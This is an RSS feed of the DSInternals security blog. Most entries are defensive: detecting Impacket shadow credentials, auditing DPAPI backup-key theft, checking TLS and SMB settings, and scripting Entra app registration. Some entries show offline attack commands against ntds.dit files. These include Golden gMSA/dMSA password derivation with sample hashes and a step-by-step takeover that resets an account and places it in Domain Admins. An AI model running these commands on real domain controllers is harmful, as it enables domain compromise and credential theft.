https://www.dsinternals.com/en/ Fri, 30 Jan 2026 20:41:03 +0000 Fri, 30 Jan 2026 20:41:03 +0000 Jekyll v4.4.1 Updated in January 2026 to reflect changes in the behavior of domain controllers regarding the CUSTOMKEYINFO_FLAGS_MFA_NOT_USED flag. TL;DR The current implementation of the shadow credentials attack in the Impacket framework, most notably used by the ntlmrelayx.py script, contains multiple bugs, leaving unique signatures on the NGC data structures written to the msDS-KeyCredentialLink LDAP attribute by malicious actors. Heuristics could be used to identify most malicious NGC keys, regardless of the hacktool they were generated by. Technical Details I noticed by chance that the current implementation of the shadow credentials attack (a term coined and popularized by Elad Shamir) in the Impacket framework produces malformed KEYCREDENTIALLINK_BLOB binary data structures, having the following issues: The KeyHash entry should contain a SHA256 hash of all other entries, but it is only calculated from the KeyMaterial entry. (Fixed in September 2025) The KeyCreationTime entry should be in the FILETIME format but is incorrectly skewed by 1600 years. (Fixed in September 2025) The DeviceId entry is expected to be present only on user accounts, but it is populated for computer accounts as well. And instead of referencing existing device objects, it contains random values. These bugs are located in the shadow_credentials.py script, which is then optionally used by the ntlmrelayx.py script when performing the NTLM Relay attack against the LDAP protocol. The shadow credentials attack was originally implemented in version 0.10.0 of Impacket, released in May 2022. The bugs were introduced to the master branch in March 2024 and published in version 0.12.0, released in September 2024. As a result, the DSInternals PowerShell module can be used to identify malformed NGC keys (AKA shadow credentials) that are still present in Active Directory (AD): #Requires -Modules DSInternals,ActiveDirectory Get-ADObject -LDAPFilter '(msDS-KeyCredentialLink=*)' -Properties msDS-KeyCredentialLink | Select-Object -ExpandProperty msDS-KeyCredentialLink | Get-ADKeyCredential | Where-Object Usage -eq NGC Sample output: Usage Source Flags DeviceId Created Owner ----- ------ ----- -------- ------- ----- NGC AD None ff53f58e-81a9-5d40-96bb-4980c91008ae 3625-02-23 CN=PC04,CN=Computers,DC=contoso,DC=com NGC AD None e49d674f-0259-44f3-a3bd-8343b76046fc 2025-02-02 CN=Administrator,CN=Users,DC=contoso,DC=com NGC AD None cfe9a872-13ff-4751-a777-aec88c30a762 2019-08-01 CN=John Doe,CN=Users,DC=contoso,DC=com NGC AzureAD None fd591087-245c-4ff5-a5ea-c14de5e2b32d 2017-07-19 CN=John Doe,CN=Users,DC=contoso,DC=com NGC AD MFANotUsed 2025-02-01 CN=PC01,CN=Computers,DC=contoso,DC=com NGC AD MFANotUsed 2017-08-23 CN=PC02,CN=Computers,DC=contoso,DC=com NGC AD 2021-06-11 CN=PC03,CN=Computers,DC=contoso,DC=com The first NGC key in the output above, supposedly created in the year 3625 instead of 2025, can serve as a very reliable indicator of AD compromise (IoC). Moreover, all open-source implementations of the shadow credentials attack generate random values for the DeviceId attribute. It is therefore possible to use Microsoft’s WHfBTools PowerShell module to identify orphaned NGC keys with non-existing device identifiers. The sample data also shows that the CUSTOMKEYINFO_FLAGS_MFA_NOT_USED flag in the CustomKeyInformation entry is used inconsistently by Windows 10+ computers, making it an unreliable indicator of malicious NGC keys. However, since January 2026 updates, domain controllers block validated writes of NGC keys with this flag absent, which violates the specification. Future Work As other implementations of the shadow credential attack might contain similar issues, broader research on this topic should be conducted. Although hacktool authors will probably react to the information contained in this article and improve their implementations accordingly, these changes will not affect pre-existing shadow credentials. Although the current version of DSInternals does not validate the KeyHash entries when parsing existing NGC keys, it correctly implements the hash calculation when generating new NGC keys or serializing existing ones. It should not be hard to implement hash validation as well. Fri, 30 Jan 2026 00:00:00 +0000 https://www.dsinternals.com/en/indicator-of-compromise-shadow-credentials-ntlm-relay-impacket/ https://www.dsinternals.com/en/indicator-of-compromise-shadow-credentials-ntlm-relay-impacket/ This blog post has originally been published at the SpecterOps Blog. Introduction Several new Active Directory offline attack capabilities have recently been added to the DSInternals PowerShell module. These enhancements include the Golden dMSA Attack, full support for Local Administrator Password Solution (LAPS), and the ability to extract trust passwords and BitLocker recovery keys. And thanks to some changes made under the hood, large ntds.dit files (100K+ users) process much faster and it is now possible to read databases originating from read-only domain controllers (RODCs). As a result, DSInternals can access all types of secret and confidential information stored in ntds.dit files, solidifying its status as the most comprehensive and feature-rich tool in its category. Offline Golden dMSA Attack The Get-ADDBServiceAccount cmdlet now retrieves both msDS-GroupManagedServiceAccount (gMSA) (introduced in Windows Server 2012) and msDS-DelegatedManagedServiceAccount (dMSA) (introduced in Windows Server 2025) object types from ntds.dit files and calculates their current managed passwords using KDS Root Keys also stored in the database. Depending on the account type, the attacks are referred to as Golden gMSA or Golden dMSA. Example: Get-ADDBServiceAccount -DatabasePath 'C:\ADBackup\ntds.dit' Sample output: DistinguishedName: CN=svc_adfs,CN=Managed Service Accounts,DC=contoso,DC=com Sid: S-1-5-21-2468531440-3719951020-3687476655-1109 Guid: 53c845f7-d9cd-471b-a364-e733641dcc86 SamAccountName: svc_adfs$ Description: ADFS Service Account Enabled: True Deleted: False UserAccountControl: WorkstationAccount SupportedEncryptionTypes: RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 ServicePrincipalName: {http/login.contoso.com, host/login.contoso.com} WhenCreated: 9/9/2023 5:02:05 PM PasswordLastSet: 9/9/2023 5:02:06 PM ManagedPasswordInterval: 30 ManagedPasswordId: RootKey=7dc95c96-fa85-183a-dff5-f70696bf0b11, Cycle=9/9/2023 10:00:00 AM (L0=361, L1=26, L2=24) ManagedPasswordPreviousId: KDS Derived Secrets (Calculated) EffectivePasswordId: RootKey=7dc95c96-fa85-183a-dff5-f70696bf0b11, Cycle=6/25/2025 8:00:00 PM (L0=363, L1=11, L2=29) NTHash: 0b5fbfb646dd7bce4f160ad69edb86ba Kerberos Keys AES256_CTS_HMAC_SHA1_96 Key: 5dcc418cd0a30453b267e6e5b158be4b4d80d23fd72a6ae4d5bd07f023517117 Iterations: 4096 AES128_CTS_HMAC_SHA1_96 Key: 8e1e66438a15d764ae2242eefd15e09a Iterations: 4096 Thu, 14 Aug 2025 00:00:00 +0000 https://www.dsinternals.com/en/active-directory-offline-attacks-dsinternals-v6/ https://www.dsinternals.com/en/active-directory-offline-attacks-dsinternals-v6/ Introduction It is best practice to register applications in Entra ID using PowerShell (or another automation tool that utilizes the Microsoft Graph API), rather than adding them manually through the Microsoft Entra Admin Center. This approach offers several advantages: Repeatable Deployment Process: Automating the registration helps prevent human errors that could lead to misconfigurations or security issues. Fast Cross-Tenant Migration: Scripting allows for quick migration between development, testing, and production environments. (You do have at least one pre-production Entra ID tenant, right?) Access to Advanced Settings: Some advanced settings are only available through the Microsoft Graph API and not exposed in the Microsoft Entra Admin Center. Improved Customer Experience: Providing customers with reliable scripts can enhance their product experience and may also reduce support costs for software vendors. Documentation: PowerShell scripts can serve as definitive and up-to-date documentation for the correct configuration of applications. Infrastructure as Code: All the advantages associated with the broader Infrastructure as Code (IaC) practice apply as well. In this article, you will learn how to automate the registration process for AzureHound, the data collector application for BloodHound Enterprise. With only minor modifications, this guide can be applied to automatically register almost any service or daemon application that is using the OAuth 2.0 client credentials grant flow in Entra ID. Required User Permissions To register applications with Microsoft Graph permissions in Entra ID, non-trivial user permissions are required. As an alternative to the almighty Global Administrator role, the following role assignments should be sufficient: Cloud Application Administrator or Application Administrator, for creating the app registration. Privileged Role Administrator, for assigning the required directory role and granting admin consent for the Microsoft Graph permissions. The User Access Administrator role is additionally needed for delegating permissions in Azure. App Registration First, we need to install the required official Microsoft.Graph.* and Az.* PowerShell modules: Install-Module -Scope AllUsers -Repository PSGallery -Force -Name @( Microsoft.Graph.Applications, Microsoft.Graph.Authentication, Microsoft.Graph.Identity.DirectoryManagement, Az.Resources, Az.Accounts ) Next, we can connect to the Microsoft Graph API while specifying all necessary permissions for the app registration process: Connect-MgGraph -NoWelcome -ContextScope Process -Scopes @( 'User.Read', 'Application.ReadWrite.All', 'AppRoleAssignment.ReadWrite.All', 'RoleManagement.ReadWrite.Directory' ) We are now ready to register the BloodHound Enterprise Collector application in Entra ID: [string] $appName = 'BloodHound Enterprise Collector' [string] $appDescription = 'Azure Data Exporter for BloodHound Enterprise (AzureHound)' [string] $homePage = 'https://specterops.io/bloodhound-enterprise' [hashtable] $infoUrls = @{ MarketingUrl = 'https://specterops.io/bloodhound-enterprise' TermsOfServiceUrl = 'https://specterops.io/terms-of-service' PrivacyStatementUrl = 'https://specterops.io/privacy-policy' SupportUrl = 'https://support.bloodhoundenterprise.io/' } [hashtable] $webUrls = @{ HomePageUrl = $homePage } [Microsoft.Graph.PowerShell.Models.IMicrosoftGraphApplication] $registeredApp = New-MgApplication -DisplayName $appName ` -Description $appDescription ` -Info $infoUrls ` -Web $webUrls ` -SignInAudience 'AzureADMyOrg' Wed, 30 Jul 2025 00:00:00 +0000 https://www.dsinternals.com/en/entra-id-azurehound-bloodhound-oauth-register-microsoft-graph-api-powershell/ https://www.dsinternals.com/en/entra-id-azurehound-bloodhound-oauth-register-microsoft-graph-api-powershell/ Introduction In this article you will learn how the Claims X-Ray NG application can be registered in Microsoft Entra ID using the Microsoft Graph PowerShell SDK. With only minor modifications, this guide can be used to register almost any SAML-based application in Entra ID using PowerShell. The Claims X-Ray NG app is a free tool that can be used to test federated identity providers and simulate application migration scenarios. It can be deployed as a drop-in replacement of the now-defunct original Claims X-Ray application from Microsoft. App Registration We will first need to install the Microsoft.Graph.Applications and Microsoft.Graph.Identity.SignIns PowerShell modules, including their dependencies: Install-Module -Name Microsoft.Graph.Applications,Microsoft.Graph.Identity.SignIns -Scope AllUsers -Force We can then connect to Microsoft Graph API while specifying all permissions required by the registration process: Connect-MgGraph -NoWelcome -ContextScope Process -Scopes @( 'User.Read', 'Application.ReadWrite.All', 'AppRoleAssignment.ReadWrite.All', 'DelegatedPermissionGrant.ReadWrite.All', 'Policy.Read.All', 'Policy.ReadWrite.ApplicationConfiguration' ) We are now ready to register the Claims X-Ray NG application in Entra ID: [string] $appName = 'Claims X-Ray NG' [string] $appDescription = 'Use the Claims X-Ray NG service to debug and troubleshoot problems with claims issuance.' [string] $redirectUrl = 'https://claimsxray.net/api/sso' [hashtable] $infoUrls = @{ MarketingUrl = 'https://claimsxray.net/#about' TermsOfServiceUrl = 'https://github.com/marcusca10/claimsxray-ng?tab=MIT-1-ov-file' } [Microsoft.Graph.PowerShell.Models.IMicrosoftGraphApplication] $registeredApp = New-MgApplication -DisplayName $appName ` -Description $appDescription ` -Web @{ RedirectUris = $redirectUrl } ` -DefaultRedirectUri $redirectUrl ` -GroupMembershipClaims All ` -Info $infoUrls Fri, 28 Mar 2025 00:00:00 +0000 https://www.dsinternals.com/en/entra-id-claims-xray-ng-saml-powershell-graph-api/ https://www.dsinternals.com/en/entra-id-claims-xray-ng-saml-powershell-graph-api/ In the recently released Windows Server 2025 and Windows 11 24H2, several network protocols have been reconfigured to be more secure by default. One of the affected protocols is the Server Message Block (SMB), where message signing is now required under most circumstances. These changes eliminate some NTLM Relay Attack vectors, but do not mitigate this hacking technique completely. The following table summarizes the old and new SMB signing enforcement defaults: Operating System SMB Client SMB Server Windows Server 2022 DC ❌* ✅ Windows Server 2022 Member ❌* ❌ Windows 11 23H2 ❌* ❌ Windows Server 2025 DC ✅ ✅ Windows Server 2025 Member ✅ ❌ Windows 11 24H2 ✅ ✅ Legend: ✅ SMB signing is required. ❌ SMB signing is not required. ❌* SMB signing is only mandated when connecting to SYSVOL and NETLOGON shares that contain Group Policy Objects (GPOs) and logon scripts. Sun, 26 Jan 2025 00:00:00 +0000 https://www.dsinternals.com/en/smb-signing-windows-server-2025-client-11-24h2-defaults/ https://www.dsinternals.com/en/smb-signing-windows-server-2025-client-11-24h2-defaults/ As passwordless authentication using Passkeys is finding its way into more and more Entra ID tenants, it is crucial for security auditors to get more than familiar with this technology. Although the FIDO2 security key management plane in the Entra ID Portal is continually improving, any security assessment of FIDO2 key usage still involves a lot of clicking: That is one of the reasons why I added the capability to retrieve the list of all FIDO2 security keys registered in an Entra ID tenant into the DSInternals PowerShell module some years ago. Since then, the same capability has been added to the official Microsoft Graph API, making FIDO2-related PowerShell queries easier than ever: # Microsoft Graph API PowerShell modules must be already installed on the computer Import-Module -Name Microsoft.Graph.Authentication, Microsoft.Graph.Users, Microsoft.Graph.Identity.SignIns ` -ErrorAction Stop # Authenticate against Entra ID Connect-MgGraph -Scopes UserAuthenticationMethod.Read ` -ContextScope Process ` -NoWelcome ` -ErrorAction Stop # Fetch FIDO2 security key details for all users Get-MgUser -All -Property Id,UserPrincipalName | ForEach-Object { Get-MgUserAuthenticationFido2Method -UserId $PSItem.Id | Add-Member -MemberType NoteProperty -Name UserPrincipalName -Value $PSItem.UserPrincipalName -PassThru } | Format-Table -Property UserPrincipalName,CreatedDateTime,DisplayName,Model,AttestationLevel,AaGuid # Logout Disconnect-MgGraph The output of the above script should look similar to the following example: UserPrincipalName CreatedDateTime DisplayName Model AttestationLevel AaGuid ----------------- --------------- ----------- ----- ---------------- ------ michael@dsinternals.com 10/29/2023 12:40:57 PM AWSC Passkey Test notAttested 01020304-0506-0708-0102-030405060708 michael@dsinternals.com 6/13/2023 8:47:47 PM Feitian NFC Feitian ePass FIDO2-NFC Authenticator attested ee041bce-25e5-4cdb-8f86-897fd6418464 michael@dsinternals.com 4/15/2023 6:55:15 AM Feitian Combi Feitian iePass FIDO Authenticator attested 3e22415d-7fdf-4ea4-8a0c-dd60c4249b9d michael@dsinternals.com 12/12/2019 9:42:21 AM YubiKey 5 YubiKey 5 Series attested cb69481e-8ff7-4039-93ec-0a2729a154a8 michael@dsinternals.com 1/14/2022 3:25:27 PM Feitian USB FP Feitian BioPass FIDO2 Authenticator attested 77010bd7-212a-4fc9-b236-d2ca5e9d4084 Additionally, the Format-Table cmdlet can also be replaced with Out-GridView: Get-MgUser -All -Property Id,UserPrincipalName | ForEach-Object { Get-MgUserAuthenticationFido2Method -UserId $PSItem.Id | Add-Member -MemberType NoteProperty -Name UserPrincipalName -Value $PSItem.UserPrincipalName -PassThru } | Select-Object -Property UserPrincipalName,CreatedDateTime,DisplayName,Model,AttestationLevel,AaGuid | Out-GridView -Title 'FIDO2 Security Keys Registered in Entra ID Tenant' -Wait This should produce a nice table with searchable and sortable data: Mon, 25 Mar 2024 00:00:00 +0000 https://www.dsinternals.com/en/entra-id-fido2-passkeys-report-powershell-graph-api/ https://www.dsinternals.com/en/entra-id-fido2-passkeys-report-powershell-graph-api/ Most Active Directory admins may not be aware that the Active Directory Users and Computers MMC snap-in can easily be extended with custom context menu items: Unfortunately, all examples that I have found online are written in the deprecated VBScript. As I strongly prefer using PowerShell, I have come up with my own solution, which I would like to share publicly. Let’s say we wanted to be able to quickly connect to computers over the Remote Desktop Protocol (RDP). We first need to create a PowerShell script called Connect-RDPRestrictedAdmin.ps1, which will be invoked by the context menu: <# .SYNOPSIS Connects to the selected computer over the Remote Desktop Protocol (RDP) in the Restricted Admin mode. .DESCRIPTION This script is intended to be executed by the Active Directory Users and Computers MMC snap-in. .PARAMETER ObjectPath ADSI path to the AD object on which the context menu action is being invoked. .PARAMETER ObjectType Type/class of the object on which the context menu action is being invoked. .EXAMPLE Connect-RDPRestrictedAdmin.ps1 "LDAP://CN=PC01,CN=Computers,DC=contoso,DC=com" computer #> param( [Parameter(Mandatory = $true, Position = 0)] [string] $ObjectPath, [Parameter(Mandatory = $true, Position = 1)] [ValidateSet('computer')] [string] $ObjectType ) # Change the PowerShell window title $Host.ui.RawUI.WindowTitle = 'Connecting over RDP...' # Fetch the computer object from AD [adsi] $computer = $ObjectPath # Load the computer's FQDN [string] $computerName = $computer.dNSHostName.ToString() if([string]::IsNullOrEmpty($computerName)) { # Fall back to the NetBIOS name / CN, which is always populated $computerName = $computer.name.ToString() } # Connect using the built-in RDP client mstsc.exe /restrictedAdmin /v:$computerName /f Tue, 19 Mar 2024 00:00:00 +0000 https://www.dsinternals.com/en/extending-active-directory-aduc-context-menu-powershell/ https://www.dsinternals.com/en/extending-active-directory-aduc-context-menu-powershell/ If LDAP over SSL (LDAPS) is running on your domain controllers (properly formatted certificates are installed on them), it is worth checking whether the legacy TLS 1.0 and TLS 1.1 protocols with 64-bit block ciphers are enabled on these DCs. Although Microsoft is planning to disable TLS 1.0 and TLS 1.1 in the near future, these protocols are still enabled by default on Windows Server 2022. The Nmap tool does a good job at checking LDAPS configuration remotely: nmap --script ssl-enum-ciphers -p 636 'contoso-dc.contoso.com' Fri, 15 Mar 2024 00:00:00 +0000 https://www.dsinternals.com/en/active-directory-domain-controller-tls-ldaps/ https://www.dsinternals.com/en/active-directory-domain-controller-tls-ldaps/ Introduction The recently released DSInternals PowerShell Module contains two new cmdlets for offline ntds.dit file access, Get-ADDBServiceAccount and Unlock-ADDBAccount. This article will guide you through the newly added capabilities. Golden gMSA Attack with Time Shifting The Get-ADDBServiceAccount cmdlet reads all Group Managed Service Accounts (gMSAs) from an Active Directory (AD) database backup (the ntds.dit file) first, then it combines them with KDS Root Keys and finally calculates the managed passwords and their hashes. In other words, this cmdlet performs a fully offline Golden gMSA Attack, against which most companies do not protect themselves. Usage of this cmdlet is pretty straightforward: Get-ADDBServiceAccount -DatabasePath '.\ADBackup\ntds.dit' Here is a sample output of this cmdlet: DistinguishedName: CN=svc_adfs,CN=Managed Service Accounts,DC=contoso,DC=com Sid: S-1-5-21-2468531440-3719951020-3687476655-1109 Guid: 53c845f7-d9cd-471b-a364-e733641dcc86 SamAccountName: svc_adfs$ Description: ADFS Service Account Enabled: True Deleted: False UserAccountControl: WorkstationAccount SupportedEncryptionTypes: RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 ServicePrincipalName: {http/login.contoso.com, host/login.contoso.com} WhenCreated: 9/9/2023 5:02:05 PM PasswordLastSet: 9/9/2023 5:02:06 PM ManagedPasswordInterval: 30 ManagedPasswordId: RootKey=7dc95c96-fa85-183a-dff5-f70696bf0b11, Cycle=9/9/2023 10:00:00 AM (L0=361, L1=26, L2=24) ManagedPasswordPreviousId: KDS Derived Secrets NTHash: 0b5fbfb646dd7bce4f160ad69edb86ba Kerberos Keys AES256_CTS_HMAC_SHA1_96 Key: 5dcc418cd0a30453b267e6e5b158be4b4d80d23fd72a6ae4d5bd07f023517117 Iterations: 4096 AES128_CTS_HMAC_SHA1_96 Key: 8e1e66438a15d764ae2242eefd15e09a Iterations: 4096 Note that the KDS Derived Secrets section was calculated by the cmdlet. As a result, the Golden gMSA attack provides a stepping stone to some other nasty online attacks against the NTLM and Kerberos authentication protocols, including Pass-the-Hash, Pass-the-Key, Overpass-the-Hash, and Silver Ticket attacks. Offline User Account Unlock The addition of the Unlock-ADDBAccount cmdlet completes the holistic capability of the DSInternals PowerShell module to perform offline user account takeovers. With access to a hard drive of a Domain Controller (DC), it is now possible to pick any pre-existing user account, even a disabled one, and to simply reset its password, enable it, unlock it, and add it to the Domain Admins group. Thanks to the common -SkipMetaUpdate parameter, it is even possible to either keep the changes local to the target DC or to replicate them to all the other DCs. Here is an example of an end-to-end approach: Unlock-ADDBAccount -SamAccountName john -DatabasePath 'D:\Windows\NTDS\ntds.dit' Enable-ADDBAccount -SamAccountName john -DatabasePath 'D:\Windows\NTDS\ntds.dit' Set-ADDBPrimaryGroup -SamAccountName john -PrimaryGroupId 512 -DatabasePath 'D:\Windows\NTDS\ntds.dit' $pass = Read-Host -AsSecureString -Prompt 'Provide a new password for user john' $key = Get-BootKey -OfflineHiveFilePath 'D:\Windows\System32\config\SYSTEM' Set-ADDBAccountPassword -SamAccountName john ` -NewPassword $pass ` -DatabasePath 'D:\Windows\NTDS\ntds.dit' ` -BootKey $key Disclaimer Remember that features exposed through these tools are not supported by Microsoft. Improper use might cause irreversible damage to domain controllers or negatively impact domain security. Sun, 01 Oct 2023 00:00:00 +0000 https://www.dsinternals.com/en/dsinternals-v4.11/ https://www.dsinternals.com/en/dsinternals-v4.11/ Introduction The Data Protection API (DPAPI) in Windows is used to encrypt passwords saved by browsers, certificate private keys, and other sensitive data. Domain controllers (DCs) hold backup master keys that can be used to decrypt all such secrets encrypted with DPAPI on domain-joined computers. These backup keys are stored as self-signed certificates in Active Directory (AD) objects of type secret called BCKUPKEY_*: Attackers with sufficient permissions can fetch these backup keys from AD through the Local Security Authority (Domain Policy) Remote Protocol (MS-LSAD / LSARPC) and use them to decrypt any secrets protected by DPAPI on all domain-joined Windows machines. It is therefore important for organizations to be able to detect the theft of DPAPI backup keys from AD by malicious actors. This article describes various ways of discovering this attack technique. Attack Classification MITRE ATT&CK® Tactic Credential Access (TA0006) MITRE ATT&CK® Technique Credentials from Password Stores (T1555) MITRE ATT&CK® Sub-Technique Unsecured Credentials: Private Keys (T1552.004) Tenable® Indicator of Attack DPAPI Domain Backup Key Extraction Microsoft® Defender for Identity Alert Malicious request of Data Protection API master key (alert ID 2020) Detection on Domain Controllers The most reliable way of detecting this attack technique is to monitor domain controllers for suspicious operations. Domain Controller Security Event Logs When a DPAPI backup key is retrieved from a domain controller (DC) through the MS-LSAD protocol, an undocumented event with the following properties is generated on that DC: Log Name Security Event ID 4662 Keywords Audit Success Task Category Other Object Access Events Object Server LSA Object Type SecretObject Accesses Query secret value Object Name Policy\Secrets\G$BCKUPKEY_* Mon, 31 Jul 2023 00:00:00 +0000 https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/ https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/